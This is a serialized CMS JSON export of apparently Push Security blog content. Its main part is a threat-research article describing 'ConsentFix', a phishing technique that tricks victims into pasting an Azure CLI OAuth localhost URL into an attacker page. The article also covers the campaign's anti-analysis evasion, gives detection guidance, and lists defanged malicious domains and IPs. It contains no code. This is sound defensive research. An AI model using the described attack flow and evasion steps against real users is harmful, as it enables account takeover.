27075},[29877],{"data":29878,"marks":29879,"value":6041,"nodeType":864},{},[29880],{"type":1455},{"data":29882,"marks":29883,"value":27084,"nodeType":864},{},[],{"data":29885,"content":29888,"nodeType":996},{"target":29886},{"sys":29887},{"id":27089,"type":1001,"linkType":1002},[],{"data":29890,"content":29891,"nodeType":860},{},[29892],{"data":29893,"marks":29894,"value":27097,"nodeType":864},{},[],{"data":29896,"content":29897,"nodeType":860},{},[29898],{"data":29899,"marks":29900,"value":27104,"nodeType":864},{},[],{"data":29902,"content":29905,"nodeType":996},{"target":29903},{"sys":29904},{"id":27109,"type":1001,"linkType":1002},[],{"data":29907,"content":29908,"nodeType":1005},{},[],{"data":29910,"content":29911,"nodeType":1009},{},[29912],{"data":29913,"marks":29914,"value":27121,"nodeType":864},{},[29915],{"type":899},{"data":29917,"content":29918,"nodeType":860},{},[29919],{"data":29920,"marks":29921,"value":27128,"nodeType":864},{},[],{"data":29923,"content":29924,"nodeType":941},{},[29925,29934,29943],{"data":29926,"content":29927,"nodeType":945},{},[29928],{"data":29929,"content":29930,"nodeType":860},{},[29931],{"data":29932,"marks":29933,"value":27141,"nodeType":864},{},[],{"data":29935,"content":29936,"nodeType":945},{},[29937],{"data":29938,"content":29939,"nodeType":860},{},[29940],{"data":29941,"marks":29942,"value":27151,"nodeType":864},{},[],{"data":29944,"content":29945,"nodeType":945},{},[29946],{"data":29947,"content":29948,"nodeType":860},{},[29949],{"data":29950,"marks":29951,"value":27161,"nodeType":864},{},[],{"data":29953,"content":29954,"nodeType":860},{},[29955],{"data":29956,"marks":29957,"value":27168,"nodeType":864},{},[],{"data":29959,"content":29960,"nodeType":1005},{},[],{"data":29962,"content":29963,"nodeType":1009},{},[29964],{"data":29965,"marks":29966,"value":27179,"nodeType":864},{},[29967],{"type":899},{"data":29969,"content":29970,"nodeType":860},{},[29971],{"data":29972,"marks":29973,"value":27186,"nodeType":864},{},[],{"data":29975,"content":29976,"nodeType":860},{},[29977],{"data":29978,"marks":29979,"value":27193,"nodeType":864},{},[],{"data":29981,"content":29982,"nodeType":860},{},[29983,29986,29993,29996,30003],{"data":29984,"marks":29985,"value":16314,"nodeType":864},{},[],{"data":29987,"content":29988,"nodeType":883},{"uri":10269},[29989],{"data":29990,"marks":29991,"value":10275,"nodeType":864},{},[29992],{"type":1455},{"data":29994,"marks":29995,"value":19754,"nodeType":864},{},[],{"data":29997,"content":29998,"nodeType":883},{"uri":1700},[29999],{"data":30000,"marks":30001,"value":10299,"nodeType":864},{},[30002],{"type":1455},{"data":30004,"marks":30005,"value":2924,"nodeType":864},{},[],{"data":30007,"content":30010,"nodeType":996},{"target":30008},{"sys":30009},{"id":27224,"type":1001,"linkType":1002},[],{"data":30012,"content":30013,"nodeType":860},{},[30014],{"data":30015,"marks":30016,"value":21,"nodeType":864},{},[],{"entries":30018},{"hyperlink":30019,"inline":30020,"block":30021},[],[],[30022,30047,30052,30058,30063,30069,30075,30082,30088,30095,30101],{"sys":30023,"__typename":1740,"content":30024,"name":30046,"title":59},{"id":26573},{"json":30025},{"nodeType":856,"data":30026,"content":30027},{},[30028],{"nodeType":860,"data":30029,"content":30030},{},[30031,30035,30043],{"nodeType":864,"value":30032,"marks":30033,"data":30034},"We recently ran a webinar packed full of attack demo's, showcasing some of the most interesting attacks intercepted by Push in 2025. ",[],{},{"nodeType":883,"data":30036,"content":30038},{"uri":30037},"https://pushsecurity.com/webinar/phishing-2025-review",[30039],{"nodeType":864,"value":30040,"marks":30041,"data":30042},"You can now watch it on demand here!",[],{},{"nodeType":864,"value":21,"marks":30044,"data":30045},[],{},"Top phishing trends insight box 1",{"sys":30048,"__typename":1724,"title":30049,"caption":30049,"layoutMode":59,"file":30050},{"id":26719},"Fake private equity fund page hosted on Google Sites. ",{"url":30051,"width":1736,"height":8971},"https://images.ctfassets.net/y1cdw1ablpvd/2DbF1Lj4h5HVGrqDhlVlTF/9efa11f318206eb913d83c254746efb1/1.png",{"sys":30053,"__typename":1724,"title":30054,"caption":30054,"layoutMode":59,"file":30055},{"id":26725},"Custom investment fund landing page hosted on Firebase.",{"url":30056,"width":1736,"height":30057},"https://images.ctfassets.net/y1cdw1ablpvd/2NH9muR2eBEPEybqQ8o0yu/ef66b40c7428790c9017181e17b33558/2.png",1080,{"sys":30059,"__typename":1724,"title":30060,"caption":30060,"layoutMode":59,"file":30061},{"id":26731},"Malvertising link for “Google Ads” taking the top Sponsored Results spot.",{"url":30062,"width":1736,"height":27843},"https://images.ctfassets.net/y1cdw1ablpvd/2gQcwHSyUKIoqlW1upRSzK/5ead4c9e6c1e6659be7d781ad85ed9ea/3.png",{"sys":30064,"__typename":1724,"title":30065,"caption":30065,"layoutMode":59,"file":30066},{"id":26898},"Example of a typical phishing link chain incorporating legitimate websites before serving up a phishing page, as shown in the Push Security “Timelines” detection feature.",{"url":30067,"width":30068,"height":1736},"https://images.ctfassets.net/y1cdw1ablpvd/3WZkEAVsAH7PWtcoQJfDG1/03826279b5dd2bc11fbbf34f82c59136/4.png",1743,{"sys":30070,"__typename":1724,"title":30071,"caption":30071,"layoutMode":59,"file":30072},{"id":27020},"Consent phishing examples where an attacker tricks the victim into authorizing an attacker-controlled app with risky permissions.",{"url":30073,"width":1736,"height":30074},"https://images.ctfassets.net/y1cdw1ablpvd/2ZgY3mMKcE6IGpH55kOuL4/2a7e78e97654faa61cf8e8b002789b96/5.png",1367,{"sys":30076,"__typename":1724,"title":30077,"caption":30077,"layoutMode":59,"file":30078},{"id":27026},"Device code phishing targeting Salesforce, as seen in the Scattered Lapsus$ Hunters campaign. ",{"url":30079,"width":30080,"height":30081},"https://images.ctfassets.net/y1cdw1ablpvd/7uvYjRiqG4E7qj3PTmTZzW/3d3ed52d3157bf12a630e35eb2ae08d1/6.png",1488,950,{"sys":30083,"__typename":1724,"title":30084,"caption":30084,"layoutMode":59,"file":30085},{"id":27064},"ClickFix attacks prompt the victim to “fix” an issue on the webpage by running code locally on their machine.",{"url":30086,"width":1736,"height":30087},"https://images.ctfassets.net/y1cdw1ablpvd/1LXv96rhy5Sv6SBlJP0bJS/6fb6b49dcd2bdc003c2aa60ed271708f/7.png",1117,{"sys":30089,"__typename":1724,"title":30090,"caption":30090,"layoutMode":59,"file":30091},{"id":27089},"ConsentFix prompts victims to paste a URL containing an OAuth code, authorising a connection to the attacker’s OAuth app tenant. ",{"url":30092,"width":30093,"height":30094},"https://images.ctfassets.net/y1cdw1ablpvd/7IfG43sz0jRnrNiKsMwN8j/1373b7cd86fe969acad27ad956612ca0/8.png",1225,1135,{"sys":30096,"__typename":1724,"title":30097,"caption":30097,"layoutMode":59,"file":30098},{"id":27109},"There are lots of ways that attackers can achieve account takeover today via phishing / social engineering.",{"url":30099,"width":1736,"height":30100},"https://images.ctfassets.net/y1cdw1ablpvd/4Wz7gAJLWDyaGjj030ypH2/7a07f1e5c46cdebd2e395d0ceb412387/9.png",969,{"sys":30102,"__typename":1717,"type":1718,"ctaText":30103,"buttonLabel":1720,"buttonColour":1721,"buttonUrl":30037},{"id":27224},"Learn how phishing evolved in 2025, showcasing the most sophisticated attacks and key trends uncovered by Push researchers",{"items":30105},[],{},"Analyzing 2025's top phishing trends",{"items":30109},[30110,30955,31475],{"__typename":2059,"sys":30111,"content":30113,"title":30941,"synopsis":30942,"hashTags":59,"publishedDate":30943,"slug":30944,"tagsCollection":30945,"authorsCollection":30951},{"id":30112},"71EaaK7lfl6bQBbkAU0qjv",{"json":30114},{"data":30115,"content":30116,"nodeType":856},{},[30117,30125,30132,30139,30146,30158,30165,30171,30177,30180,30188,30195,30202,30208,30226,30233,30239,30246,30252,30259,30302,30308,30313,30320,30327,30330,30338,30358,30365,30371,30389,30394,30412,30419,30422,30430,30437,30478,30490,30493,30501,30518,30525,30541,30548,30555,30561,30568,30571,30579,30586,30639,30646,30649,30657,30663,30670,30677,30683,30690,30723,30730,30737,30743,30750,30756,30763,30779,30786,30819,30826,30859,30862,30869,30875,30881,30897,30904,30930,30935],{"data":30118,"content":30119,"nodeType":1009},{},[30120],{"data":30121,"marks":30122,"value":30124,"nodeType":864},{},[30123],{"type":899},"Introducing “ConsentFix” — a new kind of phishing attack",{"data":30126,"content":30127,"nodeType":860},{},[30128],{"data":30129,"marks":30130,"value":30131,"nodeType":864},{},[],"The Push browser agent recently detected and blocked a new attack technique seen targeting several Push customers. ",{"data":30133,"content":30134,"nodeType":860},{},[30135],{"data":30136,"marks":30137,"value":30138,"nodeType":864},{},[],"This is a new kind of browser-based attack technique that takes over user accounts with a simple copy and paste. If you’re already logged into the app in your browser, you don’t even need to supply creds, or pass an MFA check — meaning it effectively circumvents phishing-resistant auth like passkeys too.",{"data":30140,"content":30141,"nodeType":860},{},[30142],{"data":30143,"marks":30144,"value":30145,"nodeType":864},{},[],"This is so different from the AiTM phish kits we usually come up against that we felt it deserved a new name. ",{"data":30147,"content":30148,"nodeType":860},{},[30149,30154],{"data":30150,"marks":30151,"value":30153,"nodeType":864},{},[30152],{"type":899},"Enter: ConsentFix. ",{"data":30155,"marks":30156,"value":30157,"nodeType":864},{},[],"This attack shares a lot of similarities with ClickFix/FileFix, AiTM phishing, and OAuth Consent Phishing. You can think of this as a browser-native ClickFix attack that phishes an OAuth token on a target app by getting the victim to copy and paste a URL containing OAuth key material into a phishing page. ",{"data":30159,"content":30160,"nodeType":860},{},[30161],{"data":30162,"marks":30163,"value":30164,"nodeType":864},{},[],"The campaign we detected looks to be specifically targeting Microsoft accounts by abusing the Azure CLI OAuth app. Essentially, the attacker tricks the victim into logging into Azure CLI, by generating an OAuth authorization code — visible in a localhost URL — and then pasting that URL (including the code) into an attacker-controlled page. This then creates an OAuth connection between the victim’s Microsoft account and the attacker’s Azure CLI instance. ",{"data":30166,"content":30170,"nodeType":996},{"target":30167},{"sys":30168},{"id":30169,"type":1001,"linkType":1002},"5GTnqWIbmraz8HZeHMybrP",[],{"data":30172,"content":30176,"nodeType":996},{"target":30173},{"sys":30174},{"id":30175,"type":1001,"linkType":1002},"1lcjX5q3b1bsuhyOXKvJpW",[],{"data":30178,"content":30179,"nodeType":1005},{},[],{"data":30181,"content":30182,"nodeType":1009},{},[30183],{"data":30184,"marks":30185,"value":30187,"nodeType":864},{},[30186],{"type":899},"How ConsentFix works",{"data":30189,"content":30190,"nodeType":860},{},[30191],{"data":30192,"marks":30193,"value":30194,"nodeType":864},{},[],"In all of the examples we saw, the victim accessed a malicious or compromised webpage via Google Search. The vast majority of the sites we’ve seen associated with the campaign are legitimate, compromised websites with high domain reputation that are easily findable via search engines.",{"data":30196,"content":30197,"nodeType":860},{},[30198],{"data":30199,"marks":30200,"value":30201,"nodeType":864},{},[],"The attacker had injected a fake Cloudflare Turnstile into the compromised websites, requiring an email address to be supplied in order to proceed. ",{"data":30203,"content":30207,"nodeType":996},{"target":30204},{"sys":30205},{"id":30206,"type":1001,"linkType":1002},"39jEjeLqOYIkGc4o9w3MuX",[],{"data":30209,"content":30210,"nodeType":860},{},[30211,30215,30222],{"data":30212,"marks":30213,"value":30214,"nodeType":864},{},[],"This acted as a form of ",{"data":30216,"content":30217,"nodeType":883},{"uri":26883},[30218],{"data":30219,"marks":30220,"value":28189,"nodeType":864},{},[30221],{"type":1455},{"data":30223,"marks":30224,"value":30225,"nodeType":864},{},[]," that would only continue if a valid email address and domain was supplied, designed to prevent the page from being analyzed by security bots, analysts, and low-value accounts that run the risk of exposing the campaign before the intended recipient(s) can be phished. ",{"data":30227,"content":30228,"nodeType":860},{},[30229],{"data":30230,"marks":30231,"value":30232,"nodeType":864},{},[],"If a domain not on the target list was provided, the victim was passed back to the original website and the attack did not progress to the next stage. Further, once the check has concluded per IP, the phishing page will no longer activate, even a different email is provided.  ",{"data":30234,"content":30238,"nodeType":996},{"target":30235},{"sys":30236},{"id":30237,"type":1001,"linkType":1002},"7ttmGnTzi9j87tBXfyFcOA",[],{"data":30240,"content":30241,"nodeType":860},{},[30242],{"data":30243,"marks":30244,"value":30245,"nodeType":864},{},[],"After entering an approved email address, the next stage was loaded, prompting the victim to complete a set of instructions on the page to continue.",{"data":30247,"content":30251,"nodeType":996},{"target":30248},{"sys":30249},{"id":30250,"type":1001,"linkType":1002},"2oHYNoMgAz6MdgLlcWjbaB",[],{"data":30253,"content":30254,"nodeType":860},{},[30255],{"data":30256,"marks":30257,"value":30258,"nodeType":864},{},[],"To complete the attack, the victim must:",{"data":30260,"content":30261,"nodeType":941},{},[30262,30272,30282,30292],{"data":30263,"content":30264,"nodeType":945},{},[30265],{"data":30266,"content":30267,"nodeType":860},{},[30268],{"data":30269,"marks":30270,"value":30271,"nodeType":864},{},[],"Click the “Sign In” button. This opens a new tab that loads a legitimate Microsoft URL associated with the user account/email used to access the page.",{"data":30273,"content":30274,"nodeType":945},{},[30275],{"data":30276,"content":30277,"nodeType":860},{},[30278],{"data":30279,"marks":30280,"value":30281,"nodeType":864},{},[],"If the user is already logged into Microsoft in their browser, they simply need to select their MS account from the dropdown. Otherwise, they will be required to login via the legitimate Microsoft login URL (no phishing takes place at this stage). ",{"data":30283,"content":30284,"nodeType":945},{},[30285],{"data":30286,"content":30287,"nodeType":860},{},[30288],{"data":30289,"marks":30290,"value":30291,"nodeType":864},{},[],"Once logged into legit Microsoft or the account is selected from the dropdown, the user is redirected to localhost, which generates a URL containing a code associated with the user’s Microsoft account. ",{"data":30293,"content":30294,"nodeType":945},{},[30295],{"data":30296,"content":30297,"nodeType":860},{},[30298],{"data":30299,"marks":30300,"value":30301,"nodeType":864},{},[],"To complete the phish, the victim copies the URL and pastes it onto the original page. ",{"data":30303,"content":30307,"nodeType":996},{"target":30304},{"sys":30305},{"id":30306,"type":1001,"linkType":1002},"7zendMbmCViGwtEpUQvq6y",[],{"data":30309,"content":30312,"nodeType":996},{"target":30310},{"sys":30311},{"id":22743,"type":1001,"linkType":1002},[],{"data":30314,"content":30315,"nodeType":860},{},[30316],{"data":30317,"marks":30318,"value":30319,"nodeType":864},{},[],"Once the steps are completed, the victim has granted the attacker access to their Microsoft account via Azure CLI. ",{"data":30321,"content":30322,"nodeType":860},{},[30323],{"data":30324,"marks":30325,"value":30326,"nodeType":864},{},[],"At this point, the attacker has effective control of the victim’s Microsoft account, but without ever needing to phish a password, or pass an MFA check. In fact, if the user was already logged in to their Microsoft account (i.e. they had an active session) no login is required at all. ",{"data":30328,"content":30329,"nodeType":1005},{},[],{"data":30331,"content":30332,"nodeType":1009},{},[30333],{"data":30334,"marks":30335,"value":30337,"nodeType":864},{},[30336],{"type":899},"The next evolution of ClickFix?",{"data":30339,"content":30340,"nodeType":860},{},[30341,30345,30354],{"data":30342,"marks":30343,"value":30344,"nodeType":864},{},[],"When we presented ",{"data":30346,"content":30348,"nodeType":883},{"uri":30347},"https://pushsecurity.com/webinar/clickfix",[30349],{"data":30350,"marks":30351,"value":30353,"nodeType":864},{},[30352],{"type":1455},"our last webinar on ClickFix",{"data":30355,"marks":30356,"value":30357,"nodeType":864},{},[],", we predicted that the next evolution of the attack would happen entirely within the browser context. This is because any attack that touches the endpoint (a traditionally much better protected surface) is way more likely to be detected. And with many ClickFix attacks being used to deliver infostealer malware, these attacks are really trying to get back into the browser anyway — to steal credentials and sessions stored there. ",{"data":30359,"content":30360,"nodeType":860},{},[30361],{"data":30362,"marks":30363,"value":30364,"nodeType":864},{},[],"Let’s take a closer look at the page — if you follow Push research, you might be getting déjà vu. ",{"data":30366,"content":30370,"nodeType":996},{"target":30367},{"sys":30368},{"id":30369,"type":1001,"linkType":1002},"1vMZCJ92IxFdR1EzzCOOvb",[],{"data":30372,"content":30373,"nodeType":860},{},[30374,30378,30386],{"data":30375,"marks":30376,"value":30377,"nodeType":864},{},[],"We’ve seen this kind of embedded video player before (albeit a slicker looking one) that we blogged about as ",{"data":30379,"content":30380,"nodeType":883},{"uri":13019},[30381],{"data":30382,"marks":30383,"value":30385,"nodeType":864},{},[30384],{"type":1455},"the most advanced ClickFix we’d seen",{"data":30387,"marks":30388,"value":2924,"nodeType":864},{},[],{"data":30390,"content":30393,"nodeType":996},{"target":30391},{"sys":30392},{"id":23314,"type":1001,"linkType":1002},[],{"data":30395,"content":30396,"nodeType":860},{},[30397,30401,30408],{"data":30398,"marks":30399,"value":30400,"nodeType":864},{},[],"Another similarity with ClickFix campaigns we’ve investigated is the use of Google Search as a delivery vector. 4 in 5 ClickFix attacks intercepted by Push came via Google Search, with attackers using ",{"data":30402,"content":30403,"nodeType":883},{"uri":23426},[30404],{"data":30405,"marks":30406,"value":441,"nodeType":864},{},[30407],{"type":1455},{"data":30409,"marks":30410,"value":30411,"nodeType":864},{},[]," and either compromised or custom vibe-coded websites to intercept users as they browse the internet. ",{"data":30413,"content":30414,"nodeType":860},{},[30415],{"data":30416,"marks":30417,"value":30418,"nodeType":864},{},[],"So it seems highly likely that this is a kind of browser-native evolution of ClickFix that shares many elements with typical ClickFix attacks, and is probably used by the same groups of attackers.",{"data":30420,"content":30421,"nodeType":1005},{},[],{"data":30423,"content":30424,"nodeType":1009},{},[30425],{"data":30426,"marks":30427,"value":30429,"nodeType":864},{},[30428],{"type":899},"OAuth shenanigans via Azure CLI",{"data":30431,"content":30432,"nodeType":860},{},[30433],{"data":30434,"marks":30435,"value":30436,"nodeType":864},{},[],"The clever use of Azure CLI and OAuth consent abuse is another clever iteration on previous techniques. ",{"data":30438,"content":30439,"nodeType":860},{},[30440,30444,30452,30455,30463,30467,30474],{"data":30441,"marks":30442,"value":30443,"nodeType":864},{},[],"We’ve previously seen ",{"data":30445,"content":30447,"nodeType":883},{"uri":30446},"https://phishing-techniques.pushsecurity.com/techniques/consent-phishing/",[30448],{"data":30449,"marks":30450,"value":22602,"nodeType":864},{},[30451],{"type":1455},{"data":30453,"marks":30454,"value":902,"nodeType":864},{},[],{"data":30456,"content":30458,"nodeType":883},{"uri":30457},"https://phishing-techniques.pushsecurity.com/techniques/device-code-phishing/",[30459],{"data":30460,"marks":30461,"value":13183,"nodeType":864},{},[30462],{"type":1455},{"data":30464,"marks":30465,"value":30466,"nodeType":864},{},[]," attacks where attackers have tricked victims into connecting malicious external apps into their tenant via OAuth, but this is becoming increasingly difficult in core enterprise cloud environments like Azure due to ",{"data":30468,"content":30469,"nodeType":883},{"uri":22619},[30470],{"data":30471,"marks":30472,"value":22625,"nodeType":864},{},[30473],{"type":1455},{"data":30475,"marks":30476,"value":30477,"nodeType":864},{},[],". However, since Azure CLI is a first-party Microsoft app, it is implicitly trusted in Entra ID, and is excluded from these restrictions. ",{"data":30479,"content":30480,"nodeType":860},{},[30481,30485],{"data":30482,"marks":30483,"value":30484,"nodeType":864},{},[],"First-party apps like Azure CLI are trusted by default in all tenants, allowed to request permissions without admin approval, and cannot be deleted or blocked. They can also be granted special permissions, such as tenant-wide service permissions (without needing admin approval), use of legacy or undocumented graph scopes, internal scopes for Microsoft client operations, and permissions for Office/Entra admin functions. ",{"data":30486,"marks":30487,"value":30489,"nodeType":864},{},[30488],{"type":899},"This makes Azure CLI a prime target for attackers, and significantly more exploitable than when connecting a third-party app. ",{"data":30491,"content":30492,"nodeType":1005},{},[],{"data":30494,"content":30495,"nodeType":1009},{},[30496],{"data":30497,"marks":30498,"value":30500,"nodeType":864},{},[30499],{"type":899},"Advanced detection evasion techniques",{"data":30502,"content":30503,"nodeType":860},{},[30504,30508,30514],{"data":30505,"marks":30506,"value":30507,"nodeType":864},{},[],"This campaign features some of the most advanced ",{"data":30509,"content":30510,"nodeType":883},{"uri":7124},[30511],{"data":30512,"marks":30513,"value":13810,"nodeType":864},{},[],{"data":30515,"marks":30516,"value":30517,"nodeType":864},{},[]," we've seen in the wild. ",{"data":30519,"content":30520,"nodeType":860},{},[30521],{"data":30522,"marks":30523,"value":30524,"nodeType":864},{},[],"As well as the use of Google Search to deliver the lure, and bot protection to prevent security tools from analyzing the page, there were multiple layers of anti-analysis techniques to navigate.",{"data":30526,"content":30527,"nodeType":860},{},[30528,30532,30537],{"data":30529,"marks":30530,"value":30531,"nodeType":864},{},[],"We already mentioned the use of selective targeting based on email addresses and domain names. But all sites involved in the campaign also have synchronized IP blocking — meaning if you visit one site and are served one of the associated phishing pages, the phish will never be served again, ",{"data":30533,"marks":30534,"value":30536,"nodeType":864},{},[30535],{"type":899},"across any of the sites linked to the campaign",{"data":30538,"marks":30539,"value":30540,"nodeType":864},{},[],". When you visit any of the sites again, the phish won't trigger, and it can be browsed as normal. ",{"data":30542,"content":30543,"nodeType":860},{},[30544],{"data":30545,"marks":30546,"value":30547,"nodeType":864},{},[],"On the backend, there are multiple checks based on your IP and identifiers unique to your session. Unless all of the conditions are met, certain JavaScript packages won't be served — preventing full inspection of the page to detect malicious elements. ",{"data":30549,"content":30550,"nodeType":860},{},[30551],{"data":30552,"marks":30553,"value":30554,"nodeType":864},{},[],"If the conditions aren't met, the page may not load the Cloudflare Turnstile check at all, or will redirect you back to the site to continue browsing as normal.",{"data":30556,"content":30560,"nodeType":996},{"target":30557},{"sys":30558},{"id":30559,"type":1001,"linkType":1002},"5v0zDoscA6pYLBfkXrNtIH",[],{"data":30562,"content":30563,"nodeType":860},{},[30564],{"data":30565,"marks":30566,"value":30567,"nodeType":864},{},[],"All of these make it incredibly hard to detect and block these attacks ahead of time when relying on URL-based checks and traffic analysis.",{"data":30569,"content":30570,"nodeType":1005},{},[],{"data":30572,"content":30573,"nodeType":1009},{},[30574],{"data":30575,"marks":30576,"value":30578,"nodeType":864},{},[30577],{"type":899},"Key takeaways",{"data":30580,"content":30581,"nodeType":860},{},[30582],{"data":30583,"marks":30584,"value":30585,"nodeType":864},{},[],"ConsentFix is a dangerous evolution of ClickFix and consent phishing that is incredibly hard for traditional security tools to detect and block, as:",{"data":30587,"content":30588,"nodeType":941},{},[30589,30599,30609,30619,30629],{"data":30590,"content":30591,"nodeType":945},{},[30592],{"data":30593,"content":30594,"nodeType":860},{},[30595],{"data":30596,"marks":30597,"value":30598,"nodeType":864},{},[],"The attack happens entirely inside the browser context, removing one of the key detection opportunities for ClickFix (because it doesn’t touch the endpoint).",{"data":30600,"content":30601,"nodeType":945},{},[30602],{"data":30603,"content":30604,"nodeType":860},{},[30605],{"data":30606,"marks":30607,"value":30608,"nodeType":864},{},[],"Delivering the lure via a Google Search watering hole attack completely circumvents email-based anti-phishing controls.",{"data":30610,"content":30611,"nodeType":945},{},[30612],{"data":30613,"content":30614,"nodeType":860},{},[30615],{"data":30616,"marks":30617,"value":30618,"nodeType":864},{},[],"Targeting a first-party app like Azure CLI means that many of the mitigating controls available for third-party app integrations do not apply — making this attack way harder to prevent.",{"data":30620,"content":30621,"nodeType":945},{},[30622],{"data":30623,"content":30624,"nodeType":860},{},[30625],{"data":30626,"marks":30627,"value":30628,"nodeType":864},{},[],"Because there’s no login required, phishing-resistant authentication controls like passkeys have no impact on this attack. ",{"data":30630,"content":30631,"nodeType":945},{},[30632],{"data":30633,"content":30634,"nodeType":860},{},[30635],{"data":30636,"marks":30637,"value":30638,"nodeType":864},{},[],"The use of advanced detection evasion techniques makes this attack difficult to investigate, meaning these attacks are going undetected. ",{"data":30640,"content":30641,"nodeType":860},{},[30642],{"data":30643,"marks":30644,"value":30645,"nodeType":864},{},[],"We’re sure to see more examples of ConsentFix in future. We’ll be monitoring to see how attackers adapt in terms of integrating these capabilities with common as-a-Service offerings to make them more widespread, and whether the scope extends further beyond Microsoft / Azure CLI targets in the future to target other enterprise cloud ecosystems. ",{"data":30647,"content":30648,"nodeType":1005},{},[],{"data":30650,"content":30651,"nodeType":1009},{},[30652],{"data":30653,"marks":30654,"value":30656,"nodeType":864},{},[30655],{"type":899},"Recommendations",{"data":30658,"content":30662,"nodeType":996},{"target":30659},{"sys":30660},{"id":30661,"type":1001,"linkType":1002},"3aBCwdB2aNnLRxRN5RrshC",[],{"data":30664,"content":30665,"nodeType":860},{},[30666],{"data":30667,"marks":30668,"value":30669,"nodeType":864},{},[],"On the backend, exploitation of this attack will lead to login events being observed to the Microsoft Azure CLI app. It’s likely that any legitimate use of this will most likely be limited to system administrators and possibly developers. Therefore, logins outside of these groups will be inherently more suspicious.",{"data":30671,"content":30672,"nodeType":860},{},[30673],{"data":30674,"marks":30675,"value":30676,"nodeType":864},{},[],"Additionally, it’s possible that aspects of the logins themselves will be different between legitimate Azure CLI use and exploitation of this attack. For example, see the following logs from a lab environment. The login events with an application of  “Microsoft Azure CLI” and a resource of “Azure Resource Manager” was legitimate use of the Azure CLI using the powershell CLI framework. Conversely, the login event with the Resource of “Windows Azure Active Directory” was produced by logging in using the method used by the phishing kit.",{"data":30678,"content":30682,"nodeType":996},{"target":30679},{"sys":30680},{"id":30681,"type":1001,"linkType":1002},"6ie0nkk6XbgwidfwmiGwL4",[],{"data":30684,"content":30685,"nodeType":860},{},[30686],{"data":30687,"marks":30688,"value":30689,"nodeType":864},{},[],"There is no guarantee this can be used to differentiate between legitimate and malicious examples, but it’s another data point to consider. If searching logs you may wish to use the respective GUIDs for these:",{"data":30691,"content":30692,"nodeType":941},{},[30693,30708],{"data":30694,"content":30695,"nodeType":945},{},[30696],{"data":30697,"content":30698,"nodeType":860},{},[30699,30704],{"data":30700,"marks":30701,"value":30703,"nodeType":864},{},[30702],{"type":899},"Application ID",{"data":30705,"marks":30706,"value":30707,"nodeType":864},{},[]," = 04b07795-8ddb-461a-bbee-02f9e1bf7b46",{"data":30709,"content":30710,"nodeType":945},{},[30711],{"data":30712,"content":30713,"nodeType":860},{},[30714,30719],{"data":30715,"marks":30716,"value":30718,"nodeType":864},{},[30717],{"type":899},"Resource ID",{"data":30720,"marks":30721,"value":30722,"nodeType":864},{},[]," = 00000002-0000-0000-c000-000000000000",{"data":30724,"content":30725,"nodeType":860},{},[30726],{"data":30727,"marks":30728,"value":30729,"nodeType":864},{},[],"For interactive logins, like above, you cannot rely on looking for logins from suspicious IP addresses or locations. The login itself occurs from the victims browser directly to Microsoft, and so the IP addresses associated with these events will be the legitimate IP used by the target user, not by the threat actor. ",{"data":30731,"content":30732,"nodeType":860},{},[30733],{"data":30734,"marks":30735,"value":30736,"nodeType":864},{},[],"However, for non-interactive logins and other audit logs for actions taken, you may be able to uncover unusual IP addresses that differ from the original interactive login. For example, here are some non-interactive logins that were observed immediately after compromise that came from different IP addresses in both the US and Indonesia.",{"data":30738,"content":30742,"nodeType":996},{"target":30739},{"sys":30740},{"id":30741,"type":1001,"linkType":1002},"TD3YeWqgGIWIWM8FRHU4o",[],{"data":30744,"content":30745,"nodeType":860},{},[30746],{"data":30747,"marks":30748,"value":30749,"nodeType":864},{},[],"Interestingly, they differ in which resources they accessed, with one accessing the Windows Azure Active Directory resource ID like the interactive login, but two others accessing the Microsoft Intune Checkin resource ID. ",{"data":30751,"content":30755,"nodeType":996},{"target":30752},{"sys":30753},{"id":30754,"type":1001,"linkType":1002},"57PqDQiAiwzqkspVpROQXb",[],{"data":30757,"content":30758,"nodeType":1312},{},[30759],{"data":30760,"marks":30761,"value":5571,"nodeType":864},{},[30762],{"type":899},{"data":30764,"content":30765,"nodeType":860},{},[30766,30769,30776],{"data":30767,"marks":30768,"value":12615,"nodeType":864},{},[],{"data":30770,"content":30771,"nodeType":883},{"uri":7248},[30772],{"data":30773,"marks":30774,"value":7253,"nodeType":864},{},[30775],{"type":1455},{"data":30777,"marks":30778,"value":18496,"nodeType":864},{},[],{"data":30780,"content":30781,"nodeType":860},{},[30782],{"data":30783,"marks":30784,"value":30785,"nodeType":864},{},[],"That said, the domains used to deliver the final phishing payload were:",{"data":30787,"content":30788,"nodeType":941},{},[30789,30799,30809],{"data":30790,"content":30791,"nodeType":945},{},[30792],{"data":30793,"content":30794,"nodeType":860},{},[30795],{"data":30796,"marks":30797,"value":30798,"nodeType":864},{},[],"hxxps://trustpointassurance.com/",{"data":30800,"content":30801,"nodeType":945},{},[30802],{"data":30803,"content":30804,"nodeType":860},{},[30805],{"data":30806,"marks":30807,"value":30808,"nodeType":864},{},[],"hxxps://fastwaycheck.com/",{"data":30810,"content":30811,"nodeType":945},{},[30812],{"data":30813,"content":30814,"nodeType":860},{},[30815],{"data":30816,"marks":30817,"value":30818,"nodeType":864},{},[],"hxxps://previewcentral.com",{"data":30820,"content":30821,"nodeType":860},{},[30822],{"data":30823,"marks":30824,"value":30825,"nodeType":864},{},[],"In addition, we recommend hunting for connections from the following IPs in Azure logs:",{"data":30827,"content":30828,"nodeType":941},{},[30829,30839,30849],{"data":30830,"content":30831,"nodeType":945},{},[30832],{"data":30833,"content":30834,"nodeType":860},{},[30835],{"data":30836,"marks":30837,"value":30838,"nodeType":864},{},[],"12.75.216.90",{"data":30840,"content":30841,"nodeType":945},{},[30842],{"data":30843,"content":30844,"nodeType":860},{},[30845],{"data":30846,"marks":30847,"value":30848,"nodeType":864},{},[],"182.3.36.223",{"data":30850,"content":30851,"nodeType":945},{},[30852],{"data":30853,"content":30854,"nodeType":860},{},[30855],{"data":30856,"marks":30857,"value":30858,"nodeType":864},{},[],"12.75.116.137",{"data":30860,"content":30861,"nodeType":1005},{},[],{"data":30863,"content":30864,"nodeType":1009},{},[30865],{"data":30866,"marks":30867,"value":21018,"nodeType":864},{},[30868],{"type":899},{"data":30870,"content":30871,"nodeType":860},{},[30872],{"data":30873,"marks":30874,"value":23203,"nodeType":864},{},[],{"data":30876,"content":30880,"nodeType":996},{"target":30877},{"sys":30878},{"id":30879,"type":1001,"linkType":1002},"5YzpiQH974EYA5iPPZMXkV",[],{"data":30882,"content":30883,"nodeType":860},{},[30884,30887,30894],{"data":30885,"marks":30886,"value":28337,"nodeType":864},{},[],{"data":30888,"content":30889,"nodeType":883},{"uri":7124},[30890],{"data":30891,"marks":30892,"value":28345,"nodeType":864},{},[30893],{"type":1455},{"data":30895,"marks":30896,